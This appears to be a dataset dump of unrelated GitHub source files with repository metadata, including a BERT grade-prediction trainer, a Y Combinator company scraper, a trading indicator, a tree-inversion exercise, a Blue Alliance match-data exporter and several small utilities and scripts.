mask\n","repo_name":"eluv-io/offmark-py","sub_path":"src/offmark/embed/dct_encoder.py","file_name":"dct_encoder.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"31749543927","text":"import torch\r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom transformers import BertTokenizer, BertForSequenceClassification\r\nimport os\r\nimport logging\r\n\r\nclass AssignmentDataset(Dataset):\r\n def __init__(self, assignments, tokenizer, max_length=512):\r\n self.assignments = assignments\r\n self.tokenizer = tokenizer\r\n self.max_length = max_length\r\n\r\n def __len__(self):\r\n return len(self.assignments)\r\n\r\n def __getitem__(self, idx):\r\n assignment = self.assignments[idx]\r\n encodings = self.tokenizer(assignment['brief'] + ' ' + assignment['assignment'],\r\n truncation=True,\r\n max_length=self.max_length,\r\n padding='max_length',\r\n return_tensors='pt')\r\n encodings['labels'] = torch.tensor([assignment['grade']])\r\n return {key: val.squeeze() for key, val in encodings.items()}\r\n\r\ndef train(model, data_loader, optimizer):\r\n model.train()\r\n total_loss = 0\r\n for idx, batch in enumerate(data_loader):\r\n optimizer.zero_grad()\r\n output = model(**batch)\r\n loss = output.loss\r\n loss.backward()\r\n optimizer.step()\r\n total_loss += loss.item()\r\n if (idx + 1) % 10 == 0:\r\n logger.info(f'Batch: {idx + 1}, Loss: {total_loss / (idx + 1)}')\r\n\r\n\r\ndef load_data(guidance_file, assignment_dir):\r\n with open(guidance_file, 'r', encoding='utf-8') as f:\r\n guidance = f.read()\r\n\r\n assignments = []\r\n assignment_files = [f for f in os.listdir(assignment_dir) if not f.endswith('_grade.txt')]\r\n for assignment_file in assignment_files:\r\n with open(os.path.join(assignment_dir, assignment_file), 'r', encoding='utf-8') as f:\r\n assignment = f.read()\r\n \r\n grade_file = assignment_file.replace('.txt', '_grade.txt')\r\n with open(os.path.join(assignment_dir, grade_file), 'r', encoding='utf-8') as f:\r\n grade_text = f.read().strip()\r\n if grade_text == 'U':\r\n grade = 0\r\n elif grade_text == 'Pass':\r\n grade = 1\r\n elif grade_text == 'Merit':\r\n grade = 2\r\n elif grade_text == 'Distinction':\r\n grade = 3\r\n else:\r\n raise ValueError(f'Invalid grade: {grade_text}')\r\n\r\n assignments.append({\r\n \"brief\": guidance,\r\n \"assignment\": assignment,\r\n \"grade\": grade\r\n })\r\n return assignments\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\nlogger = logging.getLogger(__name__)\r\n\r\ndef main():\r\n logging.basicConfig(level=logging.INFO)\r\n logger = logging.getLogger(__name__)\r\n\r\n logger.info(\"Loading data...\")\r\n assignments = load_data('guidance.txt', 'assignments')\r\n logger.info(f\"Loaded {len(assignments)} assignments.\")\r\n\r\n logger.info(\"Loading tokenizer...\")\r\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\r\n\r\n logger.info(\"Creating dataset and dataloader...\")\r\n dataset = AssignmentDataset(assignments, tokenizer)\r\n data_loader = DataLoader(dataset, batch_size=8, shuffle=True)\r\n\r\n logger.info(\"Loading model...\")\r\n model = BertForSequenceClassification.from_pretrained('bert-base-uncased', num_labels=4)\r\n \r\n logger.info(\"Setting up optimizer...\")\r\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-5)\r\n\r\n logger.info(\"Starting training...\")\r\n for epoch in range(10):\r\n logger.info(f'Starting epoch {epoch + 1}')\r\n train(model, data_loader, optimizer)\r\n logger.info(\"Training complete.\")\r\n \r\n logger.info(\"Saving model...\")\r\n torch.save(model.state_dict(), f'model.pt')\r\n logger.info(\"Model saved.\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"Cossy179/Grade-Marker-Bert","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19342655980","text":"from bfxhfindicators.indicator import Indicator\nfrom bfxhfindicators.sma import SMA\n\nclass AO(Indicator):\n def __init__(self, period, cache_size=None):\n self._smaShort = SMA(period, cache_size)\n self._smaLong = SMA(period, cache_size)\n\n super().__init__({\n 'args': [period, cache_size],\n 'id': 'ao',\n 'name': 'AO',\n 'seed_period': None,\n 'data_type': 'candle',\n 'data_key': '*',\n 'cache_size': cache_size\n })\n\n def reset(self):\n super().reset()\n\n self._smaShort.reset()\n self._smaLong.reset()\n\n def update(self, candle):\n v = (candle['high'] + candle['low']) / 2\n\n self._smaShort.update(v)\n self._smaLong.update(v)\n\n super().update(self._smaShort.v() - self._smaLong.v())\n return self.v()\n\n def add(self, candle):\n v = (candle['high'] + candle['low']) / 2\n\n self._smaShort.add(v)\n self._smaLong.add(v)\n\n super().add(self._smaShort.v() - self._smaLong.v())\n return self.v()\n ","repo_name":"bitfinexcom/bfx-hf-indicators-py","sub_path":"bfxhfindicators/awesome_oscillator.py","file_name":"awesome_oscillator.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"39061160294","text":"\"\"\"\nTask\nCopy the company name into the sheet.\nCopy the website link into the sheet\nCopy the CEO's name into the sheet\nCopy the CEO's LinkedIn Profile link into the sheet.\n\"\"\"\nfrom bs4 import BeautifulSoup\nimport requests\nimport brotli\nimport json\nimport time\nimport random\n\n# Load data from API retrieved on scraper_api.py\nwith open('./site.json','r', encoding=\"utf8\") as response:\n response_py = json.load(response)\n\n# Get the result of the query\nresponse_list = list(response_py.values())\ncompanies = response_list[0][0]['hits']\n\n# Instantiate 3 list to store slugs, names and websites of each company, and the final dict.\nslugs = []\n\nnames = []\n\nwebsites = []\n\ncompanies_data = {}\n\nfor company in companies:# This for loop take each company of the JSON file and save the requested data.\n slug = company['slug']\n name = company['_highlightResult'][\"name\"][\"value\"] # Copy the company name into the sheet.\n website = company['_highlightResult'][\"website\"][\"value\"]# Copy the website link into the sheet\n\n slugs.append(slug) #I store in memory to loop over this list and get access to each particular company details.\n\n companies_data[slug] = {'Company name':name,'Website':website}\n\nprint('json done')\n\nlog_dict = {} #Store any failure in the for loop\n\nfor slug in slugs:\n\n print(slug)\n\n url=f'https://www.ycombinator.com/companies/{slug}'\n\n session = requests.Session()\n session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.62'\n session.headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'\n session.headers['Accept-Encoding'] = 'gzip, deflate, br'\n session.headers['Accept-Lenguaje'] = 'en-US,en;q=0.9'\n\n response = session.get(url)\n # Check response headers\n encoding = response.encoding\n # This site has a method of encryption particular.\n html_get = response.content.decode(encoding)\n\n bs_parsed = BeautifulSoup(html_get, \"html.parser\")\n # Get all CEO's data\n leaders = bs_parsed.findAll('div', class_='leading-snug')\n\n name_ls = []\n\n linked_ls = []\n \n for leader in leaders: # This loop loops through the data for each CEO and stores it in the company_dict.\n details = leader.findAll('div')\n try:\n name = details[0].text \n except:#if no name displayed i store the slung\n log_dict[slug] = 'CEO Name'\n\n try:\n linkedin = details.find('a', {'title':'LinkedIn profile'}).get('href')\n except:#if no linkedin displayed i store the slung\n log_dict[slug] = 'CEO Linkedin'\n\n name_ls.append(name)\n linked_ls.append(linkedin)\n \n companies_data[slug]['CEO Name'] = name_ls\n companies_data[slug]['LinkedIn'] = linked_ls\n \n time.sleep(random.randint(1,5))\n\n#Now with all the data stored in company_dict it is stored as a JSON\nwith open('./companies.json', 'w') as companies_json:\n json.dump(companies_data, companies_json, indent=4)\n\n\nwith open('./log_failed.json', 'w') as logs:\n json.dump(log_dict, logs, indent=4)\n","repo_name":"NNunezManzano/scrapers","sub_path":"ycombinator/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14424660791","text":"\"\"\"\nSolution 1: Recurrsive\n\nTime: O(n)\nSpace: O(h) for the call stack where h is the height of the tree\n\nSolution 2: Iterative\n\nTime: O(n)\nSpace: O(n) for storing nodes present in any level of binary tree. Worst case happens for a full binary tree, in which last level has n/2 nodes\n\n\"\"\"\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\nfrom collections import deque\n\nclass Solution:\n \"\"\"\n @param root: a TreeNode, the root of the binary tree\n @return: nothing\n \"\"\"\n \"\"\"\n Iterative:\n \"\"\"\n def invertBinaryTree(self, root):\n if root is None:\n return None\n \n queue = deque([root])\n \n while queue:\n node = queue.popleft()\n \n temp = node.left\n node.left = node.right\n node.right = temp\n \n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n \n return root\n \n \"\"\"\n Recurrsive:\n \n def invertBinaryTree(self, root):\n # write your code here\n if root is None:\n return None\n \n new_left = self.invertBinaryTree(root.right)\n new_right = self.invertBinaryTree(root.left)\n \n root.left, root.right = new_left, new_right\n \n return root\n \"\"\"\n","repo_name":"teslamyesla/leetcode","sub_path":"python/lintcode-0175-invert-binary-tree.py","file_name":"lintcode-0175-invert-binary-tree.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"69917595667","text":"\nimport numpy as np\nimport cv2\nimport time\nimport math \nimport cProfile\n\n# Imports from our project\nfrom modules.calibrator import *\nfrom modules.gextractorNG import *\nfrom modules.dextractor import *\nfrom modules.fisheye import *\nfrom modules.settings import *\nfrom modules.network import *\nfrom modules.gpiomanager import *\nfrom modules.classifier import *\n\n# Here we build the code that calls other scripts to do all the work\ndef main(conf_file):\n # Opening data stream\n cap = cv2.VideoCapture(0)\n \n # Loading data from config.yml\n conf = Config()\n conf.load(conf_file)\n\n\n # Generating FishEye remover object\n if(conf.fish == 1):\n fishremover = FRemover(1, conf.K, conf.D, conf.DIM)\n \n # Loading perspective correction matrix from file if exits\n if(conf.matrix == 1):\n calibobj = Calib(conf.sizeXmm//conf.reduction,conf.sizeYmm//conf.reduction,conf.matrix,conf.calibfile)\n calibobj.M = conf.M\n\n # Generating data object (to stock collected data)\n \n # Initializing GPIO\n gpioM = GpioManager()\n\n # Classifier\n cl = Classifier(\"classifier/trained/cascade.xml\")\n\n i = 0\n changedConf = 0\n j = 1\n t = time.time()\n while(cap.isOpened()):\n ret, img = cap.read()\n if(img is None):\n break\n img = cv2.resize(img, (0, 0), fx=conf.img_resize_default,fy=conf.img_resize_default)\n #cv2.imshow('real', resized)\n\n # Removing fisheye\n if(conf.fish == 1):\n img = fishremover.removefish(img)\n img = cv2.resize(img, (0, 0), fx=conf.img_resize_after_fish,fy=conf.img_resize_after_fish)\n \n # Applying perspective correction matrix to frame\n if(conf.matrix):\n img = calibobj.applyCalibration(img)\n img = cv2.resize(img, (0, 0), fx=conf.img_resize_after_perpective,fy=conf.img_resize_after_perpective)\n \n cl.detectAndDisplay(img)\n \n # FPS\n if(conf.fps):\n if(time.time()-t>1): \n t = time.time()\n print(\"[INFO] {} FPS\".format(j))\n j = 1\n \n # Led & Switch\n changedConf = gpioM.update()\n if(changedConf):\n break\n \n i += 1\n j += 1\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n cap.release()\n cv2.destroyAllWindows()\n\n # Switching procedure\n if(changedConf):\n bc = BaseConfig()\n bc.load(\"config.yml\")\n if(bc.confYellow == conf_file):\n main(bc.confBlue)\n else:\n main(bc.confYellow)\n\n\nbc = BaseConfig()\nbc.load(\"config.yml\")\nmain(bc.confYellow)\n","repo_name":"arem-cdr/Camera","sub_path":"experiments/test_neuralnet/pviola/main_nn.py","file_name":"main_nn.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20619391855","text":"from match_data import *\nimport requests\nimport json\n\ndef do_api_call(url):\n r = requests.get(url=url)\n response_data = r.json()\n return response_data\n\ndef parse_data(data_dict):\n\n alliance_colours = [\"blue\", \"red\"]\n alliance_data = {\"blue\": 0, \"red\": 0}\n for alliance in alliance_colours:\n team_data = []\n auto_game_pieces = data_dict[\"score_breakdown\"][alliance][\"autoGamePieceCount\"]\n tele_game_pieces = data_dict[\"score_breakdown\"][alliance][\"teleopGamePieceCount\"]\n auto_engaged = data_dict[\"score_breakdown\"][alliance][\"autoBridgeState\"] == \"Level\"\n endgame_engaged = data_dict[\"score_breakdown\"][alliance][\"endGameBridgeState\"] == \"Level\"\n for i in range(3):\n team_number = data_dict[\"alliances\"][alliance][\"team_keys\"][i][3:]\n robot_mobility = data_dict[\"score_breakdown\"][alliance][f\"mobilityRobot{i+1}\"]\n robot_auto_charge_station = \"None\"\n if data_dict[\"score_breakdown\"][alliance][f\"autoChargeStationRobot{i+1}\"] == \"Docked\":\n if auto_engaged:\n robot_auto_charge_station = \"Engaged\"\n else:\n robot_auto_charge_station = \"Docked\"\n robot_endgame_charge_station = \"None\"\n if data_dict[\"score_breakdown\"][alliance][f\"endGameChargeStationRobot{i+1}\"] == \"Docked\":\n if endgame_engaged:\n robot_endgame_charge_station = \"Engaged\"\n else:\n robot_endgame_charge_station = \"Docked\"\n team_data.append(TeamData(team_number, robot_mobility, robot_auto_charge_station, robot_endgame_charge_station))\n\n alliance_data[alliance] = AllianceData(alliance, team_data, auto_game_pieces, tele_game_pieces)\n\n match_data = MatchData(data_dict[\"match_number\"], alliance_data)\n return match_data\n\n\ndef get_match_data(event_key, match_key):\n key = f\"{event_key}_{match_key}\"\n\n f = open(\"api_key.secret\", \"r\")\n api_key = f.read()\n f.close\n\n base_url = \"https://www.thebluealliance.com/api/v3\"\n url = f\"{base_url}/match/{key}?X-TBA-Auth-Key={api_key}\"\n\n response_data = do_api_call(url)\n return parse_data(response_data)\n\ndef write_file(data):\n file = open(\"data.csv\", \"w\")\n file.write(\"Match,Alliance,Team,Mobility,Auto Charge Station,Endgame Charge Station,Alliance Auto Pieces,Alliance Tele Pieces\\n\")\n for match in data:\n for colour in ['blue', 'red']:\n alliance = match.alliances[colour]\n for team in alliance.teams:\n line = f\"{match.match_num},{alliance.alliance_colour},{team.team_number},{team.robot_mobility},{team.robot_auto_charge_station},{team.robot_endgame_charge_station},{alliance.auto_game_pieces},{alliance.tele_game_pieces}\\n\"\n file.write(line)\n file.close\n\n\ndef main():\n print(\"Powered by The Blue Alliance. See thebluealliance.com\")\n event_key = input(\"Enter event key: \")\n match_key = input(\"Enter match key prefix: \")\n start_match = input(\"Enter start match: \")\n end_match = input(\"Enter end match: \")\n\n data = []\n for i in range(int(start_match), int(end_match) + 1):\n current_match = match_key + str(i)\n data.append(get_match_data(event_key, current_match))\n\n write_file(data)\n\n print(\"Data written\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Evan-Armoogan/2023TBAMatchData","sub_path":"get_event_match_data.py","file_name":"get_event_match_data.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35308448825","text":"import mcs\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns \nimport matplotlib.dates as mdates\nfrom mcs.data_loaders import sniffer\n\n\nloader = sniffer.SNIFFERdataloader()\ndf = loader.load_data('snifferdata11-11_184')\ndf2 = loader.load_data('snifferdata11-11_321')\n\n#Set time range for plots \ndata = df.loc[((df[['time']] < '2022-11-11 14:40:00').all(axis=1) \n& (df[['time']] > '2022-11-11 13:30:00').all(axis=1))]\n\n\n#create variables for plots\nx1 = data['time']\ny1 = data['pm2_5']\ny2 = data['pm1_0']\ny3 = data['pm10']\n\n#plot pm values over time\nsns.set()\nfig, ax = plt.subplots()\nax.plot(x1, y3, label = 'PM 10', alpha = 0.8)\nax.plot(x1, y2, label = 'PM 1', alpha = 0.8)\nax.plot(x1, y1, label = 'PM 2.5', alpha = 0.8)\nax.xaxis.set_major_formatter(mdates.DateFormatter(\"%H:%M\"))\n\nplt.ylabel('μm/m³')\nplt.xlabel('time')\nplt.title('Snifferbike PM measurements 11-11-2022')\nplt.legend()\nplt.show()\n\n\n","repo_name":"jpjagt/maqc","sub_path":"analysis/sniffer_analysis.py","file_name":"sniffer_analysis.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43517373882","text":"# 다솜이는 기타를 많이 가지고 있다. 그리고 각각의 기타는 모두 다른 시리얼 번호를 가지고 있다. 다솜이는 기타를 빨리 찾아서 빨리 사람들에게 연주해주기 위해서 기타를 시리얼 번호 순서대로 정렬하고자 한다.\r\n#\r\n# 모든 시리얼 번호는 알파벳 대문자 (A-Z)와 숫자 (0-9)로 이루어져 있다.\r\n#\r\n# 시리얼번호 A가 시리얼번호 B의 앞에 오는 경우는 다음과 같다.\r\n#\r\n# A와 B의 길이가 다르면, 짧은 것이 먼저 온다.\r\n# 만약 서로 길이가 같다면, A의 모든 자리수의 합과 B의 모든 자리수의 합을 비교해서 작은 합을 가지는 것이 먼저온다. (숫자인 것만 더한다)\r\n# 만약 1,2번 둘 조건으로도 비교할 수 없으면, 사전순으로 비교한다. 숫자가 알파벳보다 사전순으로 작다.\r\n# 시리얼이 주어졌을 때, 정렬해서 출력하는 프로그램을 작성하시오.\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nN = int(input().strip())\r\nguitar = []\r\nfor i in range(N):\r\n info = input().strip()\r\n len_info = len(info)\r\n val = 0\r\n for j in info:\r\n if j.isdigit():\r\n val += int(j)\r\n # 이름, 입력값 길이, 자릿수의 합\r\n guitar.append([info, len_info, val])\r\n\r\nguitar = sorted(guitar, key = lambda x : (x[1], x[2], x[0]))\r\nfor i in range(len(guitar)):\r\n print(guitar[i][0])\r\n","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"1000~1999/1431.py","file_name":"1431.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69904187026","text":"from typing import Optional, List\n\nimport glm # type: ignore\n\nfrom .parsing.rsm import Rsm\nfrom .utils import decode_string\n\n\nclass Node:\n def __init__(\n self,\n rsm_node: Rsm.Node,\n children: List['Node'] = [],\n parent: Optional['Node'] = None,\n ):\n self.impl = rsm_node\n self.parent = parent\n self.children = children\n self.bbox = None\n self.local_transform_matrix = glm.mat4()\n self.final_transform_matrix = glm.mat4()\n self.gltf_transform_matrix = glm.mat4()\n\n\ndef extract_nodes(rsm_obj: Rsm) -> List[Node]:\n node_list = []\n for rsm_node in rsm_obj.nodes:\n node_list.append(Node(rsm_node))\n\n for node in node_list:\n node.children = _find_children_nodes(node_list, node)\n node.parent = _find_parent_node(node_list, node)\n\n return node_list\n\n\ndef _find_parent_node(nodes: List[Node], node: Node) -> Optional[Node]:\n parent_name = decode_string(node.impl.parent_name)\n if len(parent_name) == 0:\n return None\n for other_node in nodes:\n if other_node != node and decode_string(\n other_node.impl.name) == parent_name:\n return other_node\n return None\n\n\ndef _find_children_nodes(nodes: List[Node], node: Node) -> List[Node]:\n children = []\n node_name = decode_string(node.impl.name)\n for other_node in nodes:\n parent_name = decode_string(other_node.impl.parent_name)\n if other_node == node or len(parent_name) == 0:\n continue\n if parent_name == node_name:\n children.append(other_node)\n return children","repo_name":"L1nkZ/rag2gltf","sub_path":"rag2gltf/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"3686613888","text":"from bs4 import BeautifulSoup\nfrom html import unescape\nimport os\nimport spacy\n\nimport nltk\n\nnltk.download('words')\nwords = set(nltk.corpus.words.words())\n\n\ntry:\n spacy_en = spacy.load(\"en_core_web_sm\")\nexcept:\n os.system('python -m spacy download en_core_web_sm')\n spacy_en = spacy.load(\"en_core_web_sm\")\n\n\nstops_spacy = sorted(spacy.lang.en.stop_words.STOP_WORDS)\nstops_spacy.extend([\"is\", \"to\"])\n\n\ndef remove_stopwords_spacy(text, stopwords=stops_spacy):\n text = ' '.join([word for word in text.split() if word not in stopwords])\n return text\n\n\ndef lemmatize_spacy(text):\n text = spacy_en(text)\n lemmas = [token.lemma_ for token in text]\n return \" \".join(lemmas)\n\n\ndef remove_non_eng_words(text):\n return \" \".join(w for w in nltk.wordpunct_tokenize(text) \\\n if w.lower() in words or not w.isalpha())\n\n\ndef textLower(text):\n return text.lower()\n\n\ndef remove_punctuation(text):\n text = ''.join([char if char.isalnum() or char == ' ' else ' ' for char in text])\n text = ' '.join(text.split()) # remove multiple whitespace\n\n return text\n\n\ndef normalize(text):\n # replace urls\n soup = BeautifulSoup(unescape(text), 'html')\n for a_tag in soup.find_all('a'):\n a_tag.string = 'URL'\n\n text = soup.text\n return text\n","repo_name":"Arman-Deghoyan/Document-Classification","sub_path":"serve/text_utils.py","file_name":"text_utils.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41836610835","text":"from base.test_base import TestBase\n\n\nclass TestTfqBangDan(TestBase):\n \"\"\"\n 榜单页面\n \"\"\"\n\n def setUp(self) -> None:\n self.page_name = \"/page/taofangquan/bangdan/main?main_id=1&city=qz\"\n self.switch = False\n self.classname = self.__class__.__name__\n super(TestTfqBangDan, self).setUp()\n print(\"TestTfqBangDan setup\")\n\n def test_05_click_tiezi_点击帖子(self):\n \"\"\"\n 淘房圈-榜单页面,点击帖子\n \"\"\"\n self.find_element('view[class=\"post_title tfLine1\"]').tap()\n\n self.verifyPageName('/page/taofangquan/tieziDetail/tieziDetail')\n self.get_screenshot()\n\n def test_02_click_post_发帖按钮(self):\n \"\"\"\n 淘房圈-榜单页面,点击”发帖“\n \"\"\"\n self.find_element('image[class=\"postBtn_img\"]').tap()\n\n self.verifyPageName('/page/taofangquan/writePost/writePost')\n self.get_screenshot()\n\n def test_01_click_more_推荐榜单(self):\n \"\"\"\n 淘房圈-榜单页面,点击”推荐榜单“\n \"\"\"\n self.find_element('view[class=\"more_txt\"]').tap()\n\n self.get_screenshot()\n\n def test_03_click_share_分享(self):\n \"\"\"\n 淘房圈-榜单页面,点击”分享“\n \"\"\"\n self.find_element('button[class=\"newHouseRfixed-share\"]').tap()\n\n self.get_screenshot()\n\n def test_04_click_share_hb_分享海报(self):\n \"\"\"\n 淘房圈-榜单页面,点击”分享“,生成海报\n \"\"\"\n self.find_element('button[class=\"newHouseRfixed-share\"]').tap()\n self.delay(2)\n self.find_element('button[class=\"share-btn pyq\"]').tap()\n\n self.verifyStr(True,\n self.page.element_is_exists('button[class=\"canvasToImage--saveToAlbumButton\"]'),\n '生成海报页 ok')\n self.get_screenshot()\n\n def test_06_z_click_share_hy_分享好友(self):\n \"\"\"\n 淘房圈-榜单页面,点击”分享“,分享好友\n \"\"\"\n self.find_element('button[class=\"newHouseRfixed-share\"]').tap()\n self.delay(2)\n self.find_element('button[class=\"share-btn hy\"]').tap()\n self.delay(1)\n self.input_value_by_mk('tfq/share_send.png')\n\n self.get_screenshot()\n\n","repo_name":"gzsyr/tfminium","sub_path":"tfq/test_tfq_bangdan_榜单.py","file_name":"test_tfq_bangdan_榜单.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20644080671","text":"from matplotlib.pylab import figure, show, savefig, title, axis, draw\nfrom networkx import spring_layout, draw_networkx_edges, draw_networkx_nodes\nfrom matplotlib.animation import FuncAnimation\n\n\ndef add_node(graph, i, plot_layout):\n # draw_networkx_edges(graph, plot_layout, alpha=.3)\n # draw_networkx_nodes(node, plot_layout, node_size=100, edgecolors='k', node_color='w')\n i += 1\n draw()\n\n\ndef animate_creation(network, blocking=True, save_plot=True):\n _title = 'Free-Scale Network'\n fig = figure(_title)\n axis('off')\n\n graph = network.network_plot\n plot_layout = spring_layout(graph)\n\n init_nodes = graph.nodes[:3]\n init_edges = graph.edges[:2]\n draw_networkx_nodes(graph, plot_layout, nodelist=init_nodes, node_size=100, edgecolors='k', node_color='w')\n draw_networkx_edges(graph, plot_layout, edgelist=init_edges, alpha=.3)\n draw()\n show()\n i = 3\n\n animation = FuncAnimation(fig, add_node, fargs=(graph, i, plot_layout))\n\n","repo_name":"simonsben/undergrad_thesis","sub_path":"utilities/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17735628399","text":"# These Manage the Game's Naming Easter Eggs\n# name or lowername is the name that is asked of you when you start the Main Program\n\nlowername = name.lower()\n\nif lowername == 'indra':\n slowprint(\"Isn't that interesting\", lead_dots = True)\n sleep(2)\n print(\"We have the same name\", lead_dots = True)\n sleep(2)\n\nelif lowername == \"hartsaxena\":\n print (\"Ah.\")\n sleep(1.5)\n print (\"It's you again.\")\n sleep(1.5)\n\nelif lowername == 'guido rossum' or lowername == 'guido van rossum':\n print(\"You know, a person with that same name invented Python!\")\n sleep(2)\n print(\"But you probably already knew that, didn't you?\")\n sleep(2)\n\nelif lowername == 'scott cawthon':\n print(\"it's you...\")\n sleep(1.5)\n print(\"Or should I say it's me...\")\n sleep(1)\n\nelif lowername == 'sans':\n print(\"nope.\")\n sleep(1)\n namereject = True # See Reset.py\n\nelif lowername == 'monika':\n print(\"_J̷̩̍u̶͇͂s̵͚̽t̸͈̕ M̷̪̃ŏ̷͖n̸͕̂i̷̦͝k̵͍̕a̵̛̱_\")\n sleep(1)\n print (\"I suppose great minds think alike.\")\n sleep(1.5)\n print (\"I wonder what brings you to a place like this?\")\n sleep(2)\n print (\"I suppose I'll never know.\")\n sleep(1.5)\n namereject = True\n\nelif lowername == 'gaster':\n AbruptRestart() # This Restarts the Game\n\nelif lowername == 'dwight schrute':\n print(\"I wonder...\")\n sleep(2)\n print(\"Sorry, I just thought I knew you from somewhere\")\n sleep(2)\n\nelif lowername == 'matpat':\n print(\"But that's just a Theory.\")\n sleep(0.5)\n print(\"A ga-\")\n sleep(0.25)\n namereject = True\n\nelif lowername == 'baldi':\n print(\"Congratulations!\")\n sleep(1)\n print(\"You found all Seven Notebooks!\")\n sleep(1.25)\n print(\"Now all you have to do is...\")\n namereject = True\n\nelif lowername == \"xnflp\":\n namereject = True\n\nelif lowername == \"reset\":\n exec(open(sysexecutes / \"ExecLogDel.py\").read())\nelse:\n print(\"Hello, \" + name + \"! Pleasure to meet you!\")\n sleep(2)\n\n# Executes if namereject == True and records it in the logs\nif namereject == True:\n a = open(intlog, \"a+\")\n a.write('Name Rejected: ' + name + \" Time: \" + currentdate)\n a.close()\n sys.exit()\n","repo_name":"Hartsaxena/ProjectIndra","sub_path":"Vitals/NameEggs.py","file_name":"NameEggs.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14362653606","text":"# %%\nfrom distutils import filelist\nimport os\nimport pandas as pd\nimport tkinter as tk\nfrom tkinter import filedialog\n\n# %%\n# user dialog for selection of directory\nroot = tk.Tk()\ndir = filedialog.askdirectory(parent=root, initialdir=\".\", title='Please select feature directory:')\nxlsx_file = filedialog.askopenfilename(parent=root, initialdir=\".\", title='Please select feature file (.xlsx):')\nslide_table = 'slide_table.csv'\nexcluded_table = 'excluded_table.csv'\npatient_xlsx_single_table = 'patient_xlsx_single.xlsx'\n\npatient_xlsx = pd.read_excel(xlsx_file)\npatient_xlsx_single = patient_xlsx.drop_duplicates()\npatient_list = patient_xlsx_single['PATIENT']\n\n# %%\nfilelist = []\nfor file in os.listdir(dir):\n filename = os.fsdecode(file)\n if filename.endswith(\".h5\"):\n filelist.append(filename)\n\n# %%\npats = pd.DataFrame([], columns=['PATIENT', 'FILENAME'])\nexcs = pd.DataFrame([], columns=['PATIENT'])\n\nfor patient in patient_list:\n for element in filelist:\n if patient in element:\n pats.loc[len(pats)]=([patient, element.split('.')[0]]) \n\nfor patient in patient_list:\n if patient not in pats['PATIENT'].values:\n excs.loc[len(excs)]=([patient])\n\nprint(patient_xlsx_single)\n# %%\npatient_xlsx_single.to_excel(patient_xlsx_single_table, index=False)\npats.to_csv(slide_table, columns=['PATIENT', 'FILENAME'], index=False)\nexcs.to_csv(excluded_table, columns=['PATIENT'], index=False)\n","repo_name":"gustavmarco/utils","sub_path":"find_string_in_files_and_extract.py","file_name":"find_string_in_files_and_extract.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21546129213","text":"import time\nfrom django.core.management import BaseCommand, CommandError\nfrom channels import channel_backends, DEFAULT_CHANNEL_BACKEND\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('port', nargs='?',\n help='Optional port number')\n\n def handle(self, *args, **options):\n # Get the backend to use\n channel_backend = channel_backends[DEFAULT_CHANNEL_BACKEND]\n if channel_backend.local_only:\n raise CommandError(\n \"You have a process-local channel backend configured, and so cannot run separate interface servers.\\n\"\n \"Configure a network-based backend in CHANNEL_BACKENDS to use this command.\"\n )\n # Run the interface\n port = int(options.get(\"port\", None) or 9000)\n try:\n import asyncio\n except ImportError:\n from channels.interfaces.websocket_twisted import WebsocketTwistedInterface\n self.stdout.write(\"Running 